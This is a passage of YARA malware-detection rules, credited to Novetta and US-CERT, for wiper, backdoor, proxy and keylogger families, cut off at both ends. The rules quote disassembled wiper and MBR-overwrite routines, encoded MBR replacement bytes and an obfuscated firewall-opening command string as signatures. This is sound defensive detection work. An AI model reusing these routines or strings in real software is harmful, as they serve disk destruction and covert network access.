0BB8h ; dwMilliseconds FF 15 18 10 02 10 call ds:Sleep 6A 01 push 1 ; dwTimeout 8D 4C 24 10 lea ecx, [esp+4C0h+peerEntries] 68 B0 04 00 00 push 4B0h ; dwBytesToRead 51 push ecx ; pvRecvBuffer 8B CE mov ecx, esi ; this C7 44 24 14 B0 04 00 00 mov [esp+4C8h+Memory], 4B0h E8 25 F4 FF FF call CClientConnection__RecvData 83 F8 FF cmp eax, 0FFFFFFFFh */ $recvPeers = { 68 B8 0B 00 00 FF 15 [4] 6A 01 [0-4] 68 B0 04 00 00 51 8B ?? [1-4] B0 04 00 00 E8 [4] 83 F8 FF } $logFileName = "KBD_%%s_%%02d%%02d%%02d%%02d%%02d.CAT" condition: $recvFunc in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $apiLoader in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $recvPeers in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $logFileName } rule TangoAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: // $firewall is a shared code string $firewall = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\"" $testStatus1 = "*****[Start Test -> %s:%d]" wide $testStatus2 = "*****[Relay Connect " wide $testStatus3 = "*****[Listen Port %d] - " wide $testStatus4 = "*****[Error Socket]" wide $testStatus5 = "*****[End Test]" wide condition: 2 of them } import "pe" rule TangoBravo { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "2aa9cd3a2db2bd9dbe5ee36d9a5fc42b50beca806f9d644f387d5a680a580896" strings: /* 50 push eax ; SubStr 55 push ebp ; Str FF D3 call ebx ; strstr 83 C4 08 add esp, 8 85 C0 test eax, eax 75 1A jnz short loc_401131 8A 8E 08 01 00 00 mov cl, [esi+108h] 81 C6 08 01 00 00 add esi, 108h 47 inc edi 8B C6 mov eax, esi 84 C9 test cl, cl 75 E2 jnz short loc_40110C */ $targetDomainCheck = {5? 5? FF ?? 83 C4 08 85 C0 75 ?? 8? ?? 08 01 00 00 8? ?? 08 01 00 00 4? 8B ?? 84 ?? 75 } condition: $targetDomainCheck in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule UniformAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "a24377681cf56c712e544af01ac8a5dbaa81d16851a17a147bbf5132890d7437" strings: /* 8D 44 24 10 lea eax, [esp+2Ch+ServiceStatus] 50 push eax ; lpServiceStatus 6A 01 push 1 ; dwControl 56 push esi ; hService FF D3 call ebx ; ControlService 83 7C 24 14 01 cmp [esp+2Ch+ServiceStatus.dwCurrentState], 1 75 EF jnz short loc_4010A5 56 push esi ; hService FF 15 08 70 40 00 call ds:DeleteService */ $stopDeleteService = {8D [3] 5? 6A 01 5? FF D? 83 [3] 01 75 ?? 5? FF 15} condition: $stopDeleteService in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule UniformJuliett { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "Cmd03000_1a6f62e1630d512c3b67bfdbff26270177585c82802ffa834b768ff47be0a008.bin" strings: /* 56 push esi ; hSCObject FF D5 call ebp ; CloseServiceHandle 68 B8 0B 00 00 push 0BB8h ; dwMilliseconds FF 15 38 70 40 00 call ds:Sleep 6A 00 push 0 ; fCreateHighestLevel 68 60 A9 40 00 push offset PathName ; lpPathName E8 43 FE FF FF call RecursivelyCreateDirectories 83 C4 08 add esp, 8 68 60 A9 40 00 push offset PathName ; lpFileName FF 15 3C 70 40 00 call ds:DeleteFileA */ $a = {56 FF D5 68 B8 0B 00 00 FF 15 [4] 6A 00 68 [4] E8 [4] 83 C4 08 68 [4] FF 15} $ = "wauserv.dll" $ = "Rpcss" condition: all of them } import "pe" rule WhiskeyAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "1c66e67a8531e3ff1c64ae57e6edfde7bef2352d.ex_" strings: /* E8 77 07 00 00 call _rand B1 FB mov cl, 0FBh F6 E9 imul cl 88 44 34 08 mov [esp+esi+10008h+randomData], al 46 inc esi 81 FE 00 00 01 00 cmp esi, 10000h 7C EA jl short loc_402E8D */ $randomBuffer = {E8 [4] B1 ?? F6 E9 88 [3] 4? 81 ?? 00 00 01 00 7C} /* 89 58 09 mov [eax+9], ebx C7 40 65 00 00 02 00 mov dword ptr [eax+65h], 20000h C7 40 15 04 00 00 00 mov dword ptr [eax+15h], 4 C6 40 08 08 mov byte ptr [eax+8], 8 C7 40 04 00 02 00 00 mov dword ptr [eax+4], 200h 89 18 mov [eax], ebx 89 58 0D mov [eax+0Dh], ebx C7 40 11 01 00 00 00 mov dword ptr [eax+11h], 1 89 58 69 mov [eax+69h], ebx 89 58 19 mov [eax+19h], ebx B8 01 00 00 00 mov eax, 1 */ $mbrDiskInfo = {89 ?? 09 C7 ?? 65 00 00 02 00 C7 ?? 15 04 00 00 00 C6 ?? 08 08 C7 ?? 04 00 02 00 00 89 ?? 89 ?? 0D C7 ?? 11 01 00 00 00 89 ?? 69 89 ?? 19 B8 01 00 00 00} // the replacement MBRs in both encoded (XOR 0x53) and decoded form $mbrReplacement_Decoded = { B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 } $mbrReplacement_Encoded = { E7 10 E3 53 9E 40 AD 91 D3 A9 D7 2F A0 E1 D3 EC 36 2F D2 56 53 57 D0 06 51 53 D0 06 57 53 } $licKey = "99E2428CCA4309C68AAF8C616EF3306582A64513E55C786A864BC83DAFE0C78585B692047273B0E55275102C664C5217E76B8E67F35FCE385E4328EE1AD139EA6AA26345C4F93000DBBC7EF1579D4F" condition: $licKey or $mbrReplacement_Decoded or $mbrReplacement_Encoded or $randomBuffer in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $mbrDiskInfo in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } // This rule has been modified by @mmorenog @yararules to fix some syntax errors, it's not the original rule import "pe" rule WhiskeyBravo { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "74eac0461c40316689ac2d598f606caa3965195b22f23d5acefeedfcdf056c5b" Source = "d079a266ed2a852c33cdac3df115d163ebbf2c8dae32d935e895cf8193163b13" strings: /* 6A 04 push 4 ; MaxCount <--- this arg is not found in some variants (41bad..) as wcscmp is used instead 68 08 82 00 10 push offset Str2 ; ".doc" 56 push esi ; Str1 FF D7 call edi ; _wcsnicmp <--- d07... variant uses a direct call instead 83 C4 0C add esp, 0Ch <--- when wcscmp is used, this is add esp, 8 85 C0 test eax, eax 0F 84 5B 02 00 00 jz loc_100017D5 6A 05 push 5 ; MaxCount 68 FC 81 00 10 push offset a_docx ; ".docx" 56 push esi ; Str1 FF D7 call edi ; _wcsnicmp 83 C4 0C add esp, 0Ch 85 C0 test eax, eax 0F 84 46 02 00 00 jz loc_100017D5 6A 04 push 4 ; MaxCount 68 F0 81 00 10 push offset a_docm ; ".docm" 56 push esi ; Str1 FF D7 call edi ; _wcsnicmp 83 C4 0C add esp, 0Ch 85 C0 test eax, eax 0F 84 31 02 00 00 jz loc_100017D5 6A 04 push 4 ; MaxCount 68 E4 81 00 10 push offset a_wpd ; ".wpd" 56 push esi ; Str1 FF D7 call edi ; _wcsnicmp */ $a = {68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 [4] [0-2] 68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 [4] [0-2] 68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 } $ext1 = ".wpd" wide nocase $ext2 = ".doc" wide nocase $ext3 = ".hwp" wide nocase condition: 2 of ($ext*) and $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule WhiskeyCharlie { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "47ff4f73738acc2f8433dccb2caf980d7444d723ccf2968d69f88f8f96405f96" strings: /* 66 89 55 DC mov [ebp+SystemTime.wYear], dx E8 1E 16 00 00 call _rand 6A 0C push 0Ch 99 cdq 59 pop ecx F7 F9 idiv ecx 42 inc edx 66 89 55 DE mov [ebp+SystemTime.wMonth], dx E8 0E 16 00 00 call _rand 6A 1C push 1Ch 99 cdq 59 pop ecx F7 F9 idiv ecx 42 inc edx 66 89 55 E2 mov [ebp+SystemTime.wDay], dx E8 FE 15 00 00 call _rand 6A 18 push 18h 99 cdq 59 pop ecx F7 F9 idiv ecx 66 89 55 E4 mov [ebp+SystemTime.wHour], dx E8 EF 15 00 00 call _rand 6A 3C push 3Ch 99 cdq 59 pop ecx F7 F9 idiv ecx 66 89 55 E6 mov [ebp+SystemTime.wMinute], dx E8 E0 15 00 00 call _rand 6A 3C push 3Ch 99 cdq 59 pop ecx F7 F9 idiv ecx */ $a = {66 89 55 DC E8 [4] 6A 0C 99 59 F7 F9 42 66 89 55 DE E8 [4] 6A 1C 99 59 F7 F9 42 66 89 55 E2 E8 [4] 6A 18 99 59 F7 F9 66 89 55 E4 E8 [4] 6A 3C 99 59 F7 F9 66 89 55 E6 E8 [4] 6A 3C 99 59 F7 F9 } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule WhiskeyDelta { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group trig@novetta.com" Source = "41badf10ef6f469dd1c3be201aba809f9c42f86ad77d7f83bc3895bfa289c635" strings: /* F3 A5 rep movsd 8B 7C 24 30 mov edi, [esp+28h+arg_4] 85 FF test edi, edi 7E 3A jle short loc_402018 8B 74 24 2C mov esi, [esp+28h+arg_0] 8A 44 24 08 mov al, [esp+28h+var_20] 53 push ebx 8A 4C 24 21 mov cl, [esp+2Ch+var_B] 8A 5C 24 2B mov bl, [esp+2Ch+var_1] 32 C1 xor al, cl 8A 0C 32 mov cl, [edx+esi] 32 C3 xor al, bl 32 C8 xor cl, al 88 0C 32 mov [edx+esi], cl B9 1E 00 00 00 mov ecx, 1Eh 8A 5C 0C 0C mov bl, [esp+ecx+2Ch+var_20] 88 5C 0C 0D mov [esp+ecx+2Ch+var_1F], bl 49 dec ecx 83 F9 FF cmp ecx, 0FFFFFFFFh 7F F2 jg short loc_402000 42 inc edx */ $decryption = {F3 A5 8B 7C 24 30 85 FF 7E ?? 8B 74 24 2C 8A 44 24 08 53 8A 4C 24 21 8A 5C 24 2B 32 C1 8A 0C 32 32 C3 32 C8 88 0C 32 B9 1E 00 00 00 8A 5C 0C 0C 88 5C 0C 0D 49 83 F9 FF 7F ?? 42 } $s1 = "=====IsFile=====" wide $s2 = "=====4M=====" wide $s3 = "=====IsBackup=====" wide condition: 2 of ($s*) or $decryption in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } // From CERT report https://www.us-cert.gov/ncas/alerts/TA14-353A rule SMB_Worm_Tool { strings: $STR1 = "Global\\FwtSqmSession106829323_S-1-5-19" $STR2 = "EVERYONE" $STR3 = "y0uar3@s!llyid!07,ou74n60u7f001" $STR4 = "\\KB25468.dat" condition: ( uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule Lightweight_Backdoor1 { strings: $STR1 = "NetMgStart" $STR2 = "Netmgmt.srg" condition: (uint16(0) == 0x5A4D) and all of them } rule LightweightBackdoor2 { strings: $STR1 = "prxTroy" ascii wide nocase condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule LightweightBackdoor3 { strings: $strl = { C6 45 E8 64 C6 45 E9 61 C6 45 EA 79 C6 45 EB 69 C6 45 EC 70 C6 45 ED 6D C6 45 EE 72 C6 45 EF 2E C6 45 F0 74 C6 45 F1 62 C6 45 F2 6C } // 'dayipmr.tbl' being moved to ebp condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule LightweightBackdoor4 { strings: $strl = { C6 45 F4 61 C6 45 F5 6E C6 45 F6 73 C6 45 F7 69 C6 45 F8 2E C6 45 F9 6E C6 45 FA 6C C6 45 FB 73 } // 'ansi.nls' being moved to ebp condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule LightweightBackdoor5 { strings: $strl = { C6 45 F4 74 C6 45 F5 6C C6 45 F6 76 C6 45 F7 63 C6 45 F8 2E C6 45 F9 6E C6 45 FA 6C C6 45 FB 73 } // 'tlvc.nls' being moved to ebp condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule LightweightBackdoor6 { strings: $STR1 = { 8A 10 80 ?? 4E 80 ?? 79 88 10} $STR2 = { 8A 10 80?? 79 80 ?? 4E 88 10} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule ProxyTool1 { strings: $STR1 = "pmsconfig.msi" wide $STR2 = "pmslog.msi" wide condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them } rule ProxyTool2 { strings: $STR1 = { 82 F4 DE D4 D3 C2 CA F5 C8 C8 D3 82 FB F4 DE D4 D3 C2 CA 94 95 FB D4 D1 C4 CF C8 D4 D3 89 C2 DF C2 87 8A CC 87 00 } // '%SystemRoot%\System32\svchost.exe -k' xor A7 condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule ProxyTool3 { strings: $STR2 = {8A 04 17 8B FB 34 A7 46 88 02 83 C9 FF} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and $STR2 } rule DestructiveHardDriveTool1 { strings: $str0= "MZ" $str1 = {c6 84 24 ?? ( 00 | 01 ) 00 00 } $xorInLoop = { 83 EC 20 B9 08 00 00 00 33 D2 56 8B 74 24 30 57 8D 7C 24 08 F3 A5 8B 7C 24 30 85 FF 7E 3A 8B 74 24 2C 8A 44 24 08 53 8A 4C 24 21 8A 5C 24 2B 32 C1 8A 0C 32 32 C3 32 C8 88 0C 32 B9 1E 00 00 00 8A 5C 0C 0C 88 5C 0C 0D 49 83 F9 FF 7F F2 42 88 44 24 0C 3B D7 7C D0 5B 5F 5E 83 C4 20 C3 } condition: $str0 at 0 and $xorInLoop and #str1 > 300 } /* rule DestructiveTargetCleaningTool1 { strings: $s1 = {d3000000 [4] 2c000000 [12] 95000000 [4] 6a000000 [8] 07000000} condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them } */ rule DestructiveTargetCleaningTool2 { strings: $secureWipe = { 83 EC 34 53 55 8B 6C 24 40 56 57 83 CE FF 55 C7 44 24 2C D3 00 00 00 C7 44 24 30 2C 00 00 00 89 74 24 34 89 74 24 38 C7 44 24 3C 95 00 00 00 C7 44 24 40 6A 00 00 00 89 74 24 44 C7 44 24 14 07 00 00 00 FF 15 ?? ?? ?? ?? 3B C6 89 44 24 1C 0F 84 (D8 | d9) 01 00 00 33 FF 68 00 00 01 00 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF 89 5C 24 14 0F 84 (BC | BD) 01 00 00 8B 44 24 1C A8 01 74 0A 24 FE 50 55 FF 15 ?? ?? ?? ?? 8B 44 24 4C 2B C7 74 20 48 74 0F 83 E8 02 75 1C C7 44 24 10 03 00 00 00 EB 12 C7 44 24 10 01 00 00 00 89 74 24 28 EB 04 89 7C 24 10 8B 44 24 10 89 7C 24 1C 3B C7 0F 8E ( 5C | 5d ) 01 00 00 8D 44 24 28 89 44 24 4C EB 03 83 CE FF 8B 4C 24 4C 8B 01 3B C6 74 17 8A D0 B9 00 40 00 00 8A F2 8B FB 8B C2 C1 E0 10 66 8B C2 F3 AB EB ( 13 | 14) 33 F6 (E8 | ff 15) ?? ?? ?? ?? 88 04 1E 46 81 FE 00 00 01 00 7C ( EF | ee) 6A 00 6A 00 6A 03 6A 00 6A 03 68 00 00 00 C0 55 FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 0F 84 FA 00 00 00 8D 44 24 20 50 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A 02 6A 00 6A FF 56 FF D5 8D 4C 24 18 6A 00 51 6A 01 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 56 FF D5 8B 44 24 24 8B 54 24 20 33 FF 33 DB 85 C0 7C 5A 7F 0A 85 D2 76 54 EB 04 8B 54 24 20 8B CA BD 00 00 01 00 2B CF 1B C3 85 C0 7F 0A 7C 04 3B CD 73 04 2B D7 8B EA 8B 44 24 14 8D 54 24 18 6A 00 52 55 50 56 FF 15 ?? ?? ?? ?? 8B 6C 24 18 8B 44 24 24 03 FD 83 D3 00 3B D8 7C BE 7F 08 8B 54 24 20 3B FA 72 B8 8B 2D ?? ?? ?? ?? 8B 5C 24 10 8B 7C 24 1C 8D 4B FF 3B F9 75 17 56 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 56 FF D5 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 4C 8B 6C 24 48 47 83 C1 04 3B FB 8B 5C 24 14 89 7C 24 1C 89 4C 24 4C 0F 8C ( AE | AD) FE FF FF 6A 00 55 E8 ?? ?? ?? ?? 83 C4 08 53 FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 83 C4 34 C3 } condition: $secureWipe } rule DestructiveTargetCleaningTool3 { strings: $S1_CMD_Arg = "/install" fullword $S2_CMD_Parse= "\"%s\" /install \"%s\"" fullword $S3_CMD_Builder= "\"%s\" \"%s\" \"%s\" %s" fullword condition: all of them } rule DestructiveTargetCleaningTool4 { strings: $BATCH_SCRIPT_LN1_0 = "goto x" fullword $BATCH_SCRIPT_LN1_1 = "del" fullword $BATCH_SCRIPT_LN2_0 = "if exist" fullword $BATCH_SCRIPT_LN3_0 = ":x" fullword $BATCH_SCRIPT_LN4_0 = "zz%d.bat" fullword condition: (#BATCH_SCRIPT_LN1_1 == 2) and all of them } rule DestructiveTargetCleaningTool5 { strings: $MCU_DLL_ZLIB_COMPRESSED2 = { 5C EC AB AE 81 3C C9 BC D5 A5 42 F4 54 91 04 28 34 34 79 80 6F 71 D5 52 1E 2A 0D } condition: $MCU_DLL_ZLIB_COMPRESSED2 } rule DestructiveTargetCleaningTool6 { strings: $MCU_INF_StartHexDec = {010346080A30D63633000B6263750A5052322A00103D1B570A30E67F2A00130952690A503A0D2A000E00A26E15104556766572636C7669642E657865} $MCU_INF_StartHexEnc = {6C3272386958BF075230780A0A54676166024968790C7A6779588F5E47312739310163615B3D59686721CF5F2120263E1F5413531F1E004543544C55} condition: $MCU_INF_StartHexEnc or $MCU_INF_StartHexDec } rule DestructiveTargetCleaningTool7 { strings: $a = "SetFilePointer" $b = "SetEndOfFile" $c = {75 17 56 ff 15 ?? ?? ?? ?? 6a 00 6a 00 6a 00 56 ff D5 56 ff 15 ?? ?? ?? ?? 56} condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them } rule DestructiveTargetCleaningTool8 { strings: $license = {E903FFFF820050006F007200740069006F006E007300200063006F007000790072006900670068007400200052006F006200650072007400200064006500200042006100740068002C0020004A006F007200690073002000760061006E002000520061006E007400770069006A006B002C002000440065006C00690061006E000000000000000250000000000A002200CE000800EA03FFFF8200} $PuTTY= {50007500540054005900} condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $license and not $PuTTY } rule Malwareusedbycyberthreatactor1 { strings: // vvv---- this sig hits on a legit CRT function it seems. $heapCreateFunction_0 = {33C06A003944240868001000000F94C050FF15????????85C0A3???????07436E893FEFFFF83F803A3???????0750D68F8030000E8??00000059EB0A83F8027518E8????000085C0750FFF35???????0FF15???????033C0C36A0158C3} $heapCreateFunction = { 55 8B EC B8 2C 12 00 00 E8 ?? ?? FF FF 8D 85 68 FF FF FF 53 50 C7 85 68 FF FF FF 94 00 00 00 FF 1? ?? ?? ?? ?0 85 C0 74 1A 83 BD 78 FF FF FF 02 75 11 83 BD 6C FF FF FF 05 72 08 6A 01 58 E9 02 01 00 00 8D 85 D4 ED FF F6 89 01 00 00 05 06 8? ?? ?? ?? 0F F1 5? ?? ?? ?? 08 5C 00 F8 4D 00 00 00 03 3D B8 D8 DD 4E DF FF F3 89 DD DF FF F7 41 38 A0 13 C6 17 C0 83 C7 A7 F0 42 C2 08 80 14 13 81 97 5E D8 D8 5D 4E DF FF F6 A1 65 06 8? ?? ?? ?? 0E 8? ?? ?0 00 08 3C 40 C8 5C 07 50 88 D8 5D 4E DF FF FE B4 98 D8 56 4F EF FF F6 80 40 10 00 05 05 3F F1 5? ?? ?? ?? 03 89 D6 4F EF FF F8 D8 D6 4F EF FF F7 41 38 A0 13 C6 17 C0 83 C7 A7 F0 42 C2 08 80 14 13 81 97 5E D8 D8 56 4F EF FF F5 08 D8 5D 4E DF FF F5 0E 8? ?? ?? ?? ?5 95 93 BC 37 43 E6 A2 C5 0E 8? ?? ?? ?? ?5 93 BC 35 97 43 04 08 BC 83 81 87 40 E8 03 93 B7 50 48 81 9E B0 14 13 81 97 5F 26 A0 A5 35 0E 8? ?? ?0 00 08 3C 40 C8 3F 80 27 41 D8 3F 80 37 41 88 3F 80 17 41 38 D4 5F C5 0E 89 8F EF FF F8 07 DF C0 65 91 BC 08 3C 00 35 BC 9C} // vvv---- this sig hits on a legit CRT function it seems. $getMajorMinorLinker = {568B7424086A00832600FF15???????06681384D5A75148B483C85C9740D03C18A481A880E8A401B8846015EC3} $openServiceManager = {FF15???0?0?08B?885??74????????????????5?FF15???0?0?08B?????0?0?08BF?85F?74} condition: all of them } rule Malwareusedbycyberthreatactor2 { strings: $str1 = "_quit" $str2 = "_exe" $str3 = "_put" $str4 = "_got" $str5 = "_get" $str6 ="_del" $str7 = "_dir" $str8 = { C7 44 24 18 1F F7} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule Malwareusedbycyberthreatactor3 { strings: $STR1 = { 50 68 80 00 00 00 68 FF FF 00 00 51 C7 44 24 1C 3a 8b 00 00 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } // yara rules that can cross boundaries between the various sets/types... more general detection signatures import "pe" rule wiper_unique_strings { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" company = "novetta" strings: $a = "C!@I#%VJSIEOTQWPVz034vuA" $b = "BAISEO%$2fas9vQsfvx%$" $c = "1.2.7.f-hanba-win64-v1" $d = "md %s&copy %s\\*.* %s" $e = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\"" $f = "Ge.tVol. .umeIn..for mati.onW" condition: $a or $b or $c or $d or $e or $f } rule wiper_encoded_strings { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" company = "novetta" strings: $scr = {89 D4 C4 D5 00 00 00} $explorer = {E2 DF D7 CB C8 D5 C2 D5 89 C2 DF C2 00 00 00 } $kernel32 = {CC C2 D5 C9 C2 CB 94 95 89 C3 CB CB 00 00 } condition: $scr or $explorer or $kernel32 } rule createP2P { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "CreatP2P Thread" wide condition: any of them } rule firewallOpener { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\"" condition: any of them } // sigs for the various cross-family codes import "pe" rule Caracachs: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_" strings: /* B9 10 00 00 00 mov ecx, 10h ; ecx = 16 8B 06 mov eax, [esi] ; eax = lastValue C1 EA 10 shr edx, 10h ; edx = val >> 16 81 E2 FF 7F 00 00 and edx, 7FFFh ; edx = (val >> 16) & 0x7FFF 03 C2 add eax, edx ; eax = ((val >> 16) & 0x7FFF) + lastValue 8B D0 mov edx, eax ; edx = ((val >> 16) & 0x7FFF) + lastValue 8B F8 mov edi, eax ; edi = ((val >> 16) & 0x7FFF) + lastValue 83 E2 0F and edx, 0Fh ; edx = (((val >> 16) & 0x7FFF) + lastValue) & 0xF 2B CA sub ecx, edx ; ecx = 16 - ((((val >> 16) & 0x7FFF) + lastValue)) & 0xF D3 EF shr edi, cl ; edi = (((val >> 16) & 0x7FFF) + lastValue) >> ((16 - ((val >> 16) & 0x7FFF) + lastValue) & 0xF) 8B CA mov ecx, edx ; ecx = (((val >> 16) & 0x7FFF) + lastValue) & 0xF D3 E0 shl eax, cl ; eax = (((val >> 16) & 0x7FFF) + lastValue) << ((((val >> 16) & 0x7FFF) + lastValue) & 0xF) 0B F8 or edi, eax ; edi = (((val >> 16) & 0x7FFF) + lastValue) >> ((16 - ((val >> 16) & 0x7FFF) + lastValue) & 0xF) | (((val >> 16) & 0x7FFF) + lastValue) << ((((val >> 16) & 0x7FFF) + lastValue) & 0xF) 89 3E mov [esi], edi ; pLastValue = (((val >> 16) & 0x7FFF) + lastValue) >> ((16 - ((val >> 16) & 0x7FFF) + lastValue) & 0xF) | (((val >> 16) & 0x7FFF) + lastValue) << ((((val >> 16) & 0x7FFF) + lastValue) & 0xF) */ $a = {B? 10 00 00 00 8B ?? C1 ?? 10 81 ?? FF 7F 00 00 03 ?? 8B ?? 8B ?? 83 ?? 0F 2B ?? D3 ?? 8B ?? D3 ?? 0B ?? 89 ?? } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule StringDotSimplified: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_" strings: /* F3 AB rep stosd 80 3A 00 cmp byte ptr [edx], 0 74 15 jz short loc_404170 8A 02 mov al, [edx] 3C 2E cmp al, 2Eh 74 07 jz short loc_404168 3C 20 cmp al, 20h 74 03 jz short loc_404168 88 06 mov [esi], al 46 inc esi */ $a = { F3 AB 80 ?? 00 74 ?? 8A 02 3C 2E 74 ?? 3C 20 74 ?? 88 06 46 } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule FakeTLS_ServerHelloGetSelectedCipher: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_" strings: /* 24 10 and al, 10h 0C 10 or al, 10h 89 07 mov [edi], eax 66 8B 44 24 14 mov ax, [esp+0Ch+wCipherSuiteID] 66 3D 00 C0 cmp ax, 0C000h 73 34 jnb short loc_4067C1 66 2D 35 00 sub ax, 35h 66 F7 D8 neg ax 1B C0 sbb eax, eax 24 80 and al, 80h 05 00 01 00 00 add eax, 100h 8B D8 mov ebx, eax 53 push ebx ; hostshort */ $a = { 24 10 0C 10 89 ?? 66 8? [3] 66 3? 00 C0 73 ?? 66 2? 35 00 66 F7 ?? 1B ?? 2? 80 0? 00 01 00 00 8B ?? 5? } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + 